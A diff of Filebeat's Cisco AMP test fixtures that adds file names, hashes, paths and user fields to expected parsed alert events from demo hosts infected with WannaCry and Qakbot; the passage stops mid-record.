"Demo_WannaCry_Ransomware" @@ -2792,6 +5275,9 @@ "8.8.8.8", "10.10.10.10" ], + "related.user": [ + "user@testdomain.com" + ], "service.type": "cisco", "tags": [ "cisco-amp", @@ -2799,7 +5285,7 @@ ] }, { - "@timestamp": "2021-01-14T17:39:51.000Z", + "@timestamp": "2021-01-14T17:39:50.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", @@ -2810,10 +5296,9 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection_id": "6419275394960064603", - "cisco.amp.error.description": "Delete pending", - "cisco.amp.error.error_code": 3221225558, - "cisco.amp.event_type_id": 2164260880, + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419275394960064607", + "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" @@ -2821,24 +5306,34 @@ "cisco.amp.related.mac": [ "53:74:31:cb:37:50" ], - "cisco.amp.timestamp_nanoseconds": 281000000, - "event.action": "Quarantine Failure", + "cisco.amp.timestamp_nanoseconds": 907000000, + "event.action": "Threat Detected", "event.category": [ + "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6419275399255032000, + "event.id": 6419275394960065000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", "fileset.name": "amp", "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 95628, + "log.offset": 113313, "related.hash": [ - "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" ], "related.hosts": [ "Demo_WannaCry_Ransomware" @@ -2847,6 +5342,9 @@ "8.8.8.8", "10.10.10.10" ], + "related.user": [ + "user@testdomain.com" + ], "service.type": "cisco", "tags": [ "cisco-amp", @@ -2854,7 +5352,7 @@ ] }, { - "@timestamp": "2021-01-14T17:39:51.000Z", + "@timestamp": "2021-01-14T17:39:50.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", @@ -2865,10 +5363,9 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection_id": "6419275394960064602", - "cisco.amp.error.description": "Delete pending", - "cisco.amp.error.error_code": 3221225558, - "cisco.amp.event_type_id": 2164260880, + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419275394960064604", + "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" @@ -2876,24 +5373,34 @@ "cisco.amp.related.mac": [ "53:74:31:cb:37:50" ], - "cisco.amp.timestamp_nanoseconds": 281000000, - "event.action": "Quarantine Failure", + "cisco.amp.timestamp_nanoseconds": 891000000, + "event.action": "Threat Detected", "event.category": [ + "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6419275399255032000, + "event.id": 6419275394960065000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", "fileset.name": "amp", "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 96814, + "log.offset": 114684, "related.hash": [ - "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" ], "related.hosts": [ "Demo_WannaCry_Ransomware" @@ -2902,6 +5409,9 @@ "8.8.8.8", "10.10.10.10" ], + "related.user": [ + "user@testdomain.com" + ], "service.type": "cisco", "tags": [ "cisco-amp", @@ -2909,7 +5419,7 @@ ] }, { - "@timestamp": "2021-01-14T17:39:51.000Z", + "@timestamp": "2021-01-14T17:39:50.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", @@ -2920,10 +5430,9 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection_id": "6419275394960064601", - "cisco.amp.error.description": "Delete pending", - "cisco.amp.error.error_code": 3221225558, - "cisco.amp.event_type_id": 2164260880, + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419275394960064603", + "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" @@ -2931,24 +5440,34 @@ "cisco.amp.related.mac": [ "53:74:31:cb:37:50" ], - "cisco.amp.timestamp_nanoseconds": 281000000, - "event.action": "Quarantine Failure", + "cisco.amp.timestamp_nanoseconds": 876000000, + "event.action": "Threat Detected", "event.category": [ + "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6419275399255032000, + "event.id": 6419275394960065000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", "fileset.name": "amp", "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 98000, + "log.offset": 116055, "related.hash": [ - "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" ], "related.hosts": [ "Demo_WannaCry_Ransomware" @@ -2957,6 +5476,9 @@ "8.8.8.8", "10.10.10.10" ], + "related.user": [ + "user@testdomain.com" + ], "service.type": "cisco", "tags": [ "cisco-amp", @@ -2964,7 +5486,7 @@ ] }, { - "@timestamp": "2021-01-14T17:39:51.000Z", + "@timestamp": "2021-01-14T17:39:50.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", @@ -2975,10 +5497,9 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection_id": "6419275394960064598", - "cisco.amp.error.description": "Delete pending", - "cisco.amp.error.error_code": 3221225558, - "cisco.amp.event_type_id": 2164260880, + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419275394960064602", + "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" @@ -2986,24 +5507,34 @@ "cisco.amp.related.mac": [ "53:74:31:cb:37:50" ], - "cisco.amp.timestamp_nanoseconds": 281000000, - "event.action": "Quarantine Failure", + "cisco.amp.timestamp_nanoseconds": 845000000, + "event.action": "Threat Detected", "event.category": [ + "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6419275399255032000, + "event.id": 6419275394960065000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", "fileset.name": "amp", "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 99186, + "log.offset": 117426, "related.hash": [ - "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" ], "related.hosts": [ "Demo_WannaCry_Ransomware" @@ -3012,6 +5543,9 @@ "8.8.8.8", "10.10.10.10" ], + "related.user": [ + "user@testdomain.com" + ], "service.type": "cisco", "tags": [ "cisco-amp", @@ -3019,7 +5553,7 @@ ] }, { - "@timestamp": "2021-01-14T17:39:51.000Z", + "@timestamp": "2021-01-14T17:39:50.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", @@ -3030,10 +5564,9 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection_id": "6419275394960064600", - "cisco.amp.error.description": "Delete pending", - "cisco.amp.error.error_code": 3221225558, - "cisco.amp.event_type_id": 2164260880, + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419275394960064601", + "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" @@ -3041,24 +5574,34 @@ "cisco.amp.related.mac": [ "53:74:31:cb:37:50" ], - "cisco.amp.timestamp_nanoseconds": 281000000, - "event.action": "Quarantine Failure", + "cisco.amp.timestamp_nanoseconds": 798000000, + "event.action": "Threat Detected", "event.category": [ + "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6419275399255032000, + "event.id": 6419275394960065000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", "fileset.name": "amp", "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 100372, + "log.offset": 118797, "related.hash": [ - "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" ], "related.hosts": [ "Demo_WannaCry_Ransomware" @@ -3067,6 +5610,9 @@ "8.8.8.8", "10.10.10.10" ], + "related.user": [ + "user@testdomain.com" + ], "service.type": "cisco", "tags": [ "cisco-amp", @@ -3074,7 +5620,7 @@ ] }, { - "@timestamp": "2021-01-14T17:39:51.000Z", + "@timestamp": "2021-01-14T17:39:50.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", @@ -3085,8 +5631,9 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection_id": "6419275394960064599", - "cisco.amp.event_type_id": 553648143, + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419275394960064598", + "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" @@ -3094,24 +5641,34 @@ "cisco.amp.related.mac": [ "53:74:31:cb:37:50" ], - "cisco.amp.timestamp_nanoseconds": 281000000, - "event.action": "Threat Quarantined", + "cisco.amp.timestamp_nanoseconds": 767000000, + "event.action": "Threat Detected", "event.category": [ + "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6419275399255032000, + "event.id": 6419275394960065000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", "fileset.name": "amp", "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 105894, + "log.offset": 120168, "related.hash": [ - "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" ], "related.hosts": [ "Demo_WannaCry_Ransomware" @@ -3120,6 +5677,9 @@ "8.8.8.8", "10.10.10.10" ], + "related.user": [ + "user@testdomain.com" + ], "service.type": "cisco", "tags": [ "cisco-amp", @@ -3138,10 +5698,9 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection_id": "6419275394960064597", - "cisco.amp.error.description": "Delete pending", - "cisco.amp.error.error_code": 3221225558, - "cisco.amp.event_type_id": 2164260880, + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419275394960064600", + "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" @@ -3149,9 +5708,10 @@ "cisco.amp.related.mac": [ "53:74:31:cb:37:50" ], - "cisco.amp.timestamp_nanoseconds": 423000000, - "event.action": "Quarantine Failure", + "cisco.amp.timestamp_nanoseconds": 751000000, + "event.action": "Threat Detected", "event.category": [ + "file", "malware" ], "event.dataset": "cisco.amp", @@ -3159,14 +5719,23 @@ "event.kind": "alert", "event.module": "cisco", "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", "fileset.name": "amp", "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 107014, + "log.offset": 121539, "related.hash": [ - "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" ], "related.hosts": [ "Demo_WannaCry_Ransomware" @@ -3175,6 +5744,9 @@ "8.8.8.8", "10.10.10.10" ], + "related.user": [ + "user@testdomain.com" + ], "service.type": "cisco", "tags": [ "cisco-amp", @@ -3193,10 +5765,9 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection_id": "6419275394960064596", - "cisco.amp.error.description": "Delete pending", - "cisco.amp.error.error_code": 3221225558, - "cisco.amp.event_type_id": 2164260880, + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419275394960064599", + "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" @@ -3204,9 +5775,10 @@ "cisco.amp.related.mac": [ "53:74:31:cb:37:50" ], - "cisco.amp.timestamp_nanoseconds": 377000000, - "event.action": "Quarantine Failure", + "cisco.amp.timestamp_nanoseconds": 735000000, + "event.action": "Threat Detected", "event.category": [ + "file", "malware" ], "event.dataset": "cisco.amp", @@ -3214,14 +5786,23 @@ "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", "fileset.name": "amp", "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 108200, + "log.offset": 122910, "related.hash": [ - "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" ], "related.hosts": [ "Demo_WannaCry_Ransomware" @@ -3230,6 +5811,9 @@ "8.8.8.8", "10.10.10.10" ], + "related.user": [ + "user@testdomain.com" + ], "service.type": "cisco", "tags": [ "cisco-amp", @@ -3248,20 +5832,21 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection_id": "6419275394960064594", - "cisco.amp.error.description": "Delete pending", - "cisco.amp.error.error_code": 3221225558, - "cisco.amp.event_type_id": 2164260880, + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419275394960064597", + "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ "53:74:31:cb:37:50" ], - "cisco.amp.timestamp_nanoseconds": 33000000, - "event.action": "Quarantine Failure", + "cisco.amp.timestamp_nanoseconds": 423000000, + "event.action": "Threat Detected", "event.category": [ + "file", "malware" ], "event.dataset": "cisco.amp", @@ -3269,14 +5854,22 @@ "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\WINDOWS\\tasksche.exe", "fileset.name": "amp", "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 109386, + "log.offset": 124281, + "process.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "process.name": "mssecsvc.exe", + "process.pid": 6404, "related.hash": [ - "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "related.hosts": [ "Demo_WannaCry_Ransomware" @@ -3285,6 +5878,9 @@ "8.8.8.8", "10.10.10.10" ], + "related.user": [ + "user@testdomain.com" + ], "service.type": "cisco", "tags": [ "cisco-amp", diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp5.ndjson.log-expected.json b/x-pack/filebeat/module/cisco/amp/test/cisco_amp5.ndjson.log-expected.json index 546e93300ef6..7f5499ebf3c6 100644 --- a/x-pack/filebeat/module/cisco/amp/test/cisco_amp5.ndjson.log-expected.json +++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp5.ndjson.log-expected.json @@ -180,6 +180,69 @@ "forwarded" ] }, + { + "@timestamp": "2021-01-14T17:39:49.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419275390665097297", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 831000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275390665097000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.name": "mssecsvc.exe", + "file.path": "\\\\?\\C:\\Windows\\mssecsvc.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 3893, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, { "@timestamp": "2021-01-14T17:39:49.000Z", "cisco.amp.computer.active": true, @@ -196,46 +259,694 @@ "cisco.amp.detection_id": "6419275390665097296", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", - "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 706000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275390665097000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "db349b97c37d22f5ea1d1841e3c89eb4", + "file.hash.sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.name": "mssecsvc.exe", + "file.path": "\\\\?\\C:\\WINDOWS\\mssecsvc.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 5147, + "process.hash.md5": "4e568dbe3fff1a0025eb432dc929b78f", + "process.hash.sha1": "7abcc82dc5a05b4f53fd0fbd386738e5555025cf", + "process.hash.sha256": "26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71", + "process.name": "lsass.exe", + "process.pid": 708, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "db349b97c37d22f5ea1d1841e3c89eb4", + "e889544aff85ffaf8b0d0da705105dee7c97fe26" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:49.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Gen.20gl.1201", + "cisco.amp.detection_id": "6419275390665097295", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 643000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275390665097000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "db349b97c37d22f5ea1d1841e3c89eb4", + "file.hash.sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.name": "mssecsvc.exe", + "file.path": "\\\\?\\C:\\Windows\\mssecsvc.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 6745, + "process.hash.md5": "4e568dbe3fff1a0025eb432dc929b78f", + "process.hash.sha1": "7abcc82dc5a05b4f53fd0fbd386738e5555025cf", + "process.hash.sha256": "26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71", + "process.name": "lsass.exe", + "process.pid": 708, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "db349b97c37d22f5ea1d1841e3c89eb4", + "e889544aff85ffaf8b0d0da705105dee7c97fe26" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:49.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275390665097296", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 721000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275390665097000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 8343, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:59:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6411525251028484105", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 698000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411525251028484000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": 